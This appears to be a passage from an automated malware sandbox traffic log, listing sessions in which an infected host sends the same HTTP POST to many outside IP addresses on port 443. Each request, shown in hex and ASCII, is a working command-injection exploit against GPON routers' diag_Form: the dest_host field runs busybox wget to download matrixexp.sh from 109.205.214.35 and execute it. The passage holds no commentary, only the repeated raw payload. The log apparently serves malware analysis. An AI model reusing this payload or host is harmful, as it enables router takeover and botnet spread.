                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1448192.168.2.1348434118.180.9.56443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749618053 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1449192.168.2.133602442.72.207.163443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749631882 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1450192.168.2.13575445.242.74.15443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749639034 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1451192.168.2.1340354118.57.169.179443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749639034 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1452192.168.2.1344936212.225.70.234443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749682903 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1453192.168.2.1347782109.217.239.89443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749695063 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1454192.168.2.1351908212.199.188.106443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749706984 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1455192.168.2.1352090118.238.118.169443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749706984 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1456192.168.2.1352210109.164.149.61443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749728918 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1457192.168.2.134780442.144.119.171443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749730110 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1458192.168.2.1339994212.230.97.179443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749737024 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1459192.168.2.135947042.144.37.51443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749780893 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1460192.168.2.1355660212.165.21.187443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749787092 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1461192.168.2.13601125.145.203.27443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749790907 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1462192.168.2.1334820109.119.139.113443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749811888 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1463192.168.2.13462645.16.133.146443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749816895 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1464192.168.2.1335426118.65.87.16443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749835014 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1465192.168.2.133961642.88.226.155443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749842882 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1466192.168.2.1336186118.229.115.27443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749844074 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1467192.168.2.1350294118.152.64.219443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749855042 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1468192.168.2.135298242.167.4.148443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749871016 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1469192.168.2.134553642.140.180.4443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749885082 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1470192.168.2.13344085.43.48.107443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.749914885 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
